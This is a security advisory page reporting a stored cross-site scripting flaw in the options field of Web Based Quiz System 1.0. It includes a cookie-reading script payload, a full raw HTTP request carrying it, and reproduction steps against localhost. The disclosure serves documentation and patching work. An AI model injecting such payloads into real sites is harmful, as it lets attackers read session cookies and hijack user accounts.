Web Based Quiz System 1.0 Cross Site Scripting

2021.03.02
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting # Date: 2021-03-02 # Exploit Author: Praharsh Kumar Singh # Vendor Homepage: https://www.sourcecodester.com # Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html # Software: Web Based Quiz System # Version: 1.0 # Vulnerability Type: Cross-site Scripting # Vulnerability: Persistent/Stored XSS # Tested on: Parrot OS # Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe # in adding questions in options parameter affected from this vulnerability. # payload: </script><script >alert(document.cookie)</script> POST /onlinequiz_0/update.php?q=addqns&n=1&eid=603d2f766b0d0&ch=4 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 101 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/onlinequiz_0/dashboard.php?q=4&step=2&eid=603d2f766b0d0&n=1 Cookie: PHPSESSID=icctgctoho6nlqc6cbp8bftkeh Upgrade-Insecure-Requests: 1 Sec-GPC: 1 qns1=1&11=1&12=1&13=%3C%2Fscript%3E%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&14=1&ans1=c POC: # go to url http://localhost:8080/admin.php # login and add question # then put the above payload in MCQ options parameter # then fill the remaining details # then click add # go to url http://localhost:8080/login.php # then login to user account # then attempt the quiz while attempting the quiz xss pop up there..!


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top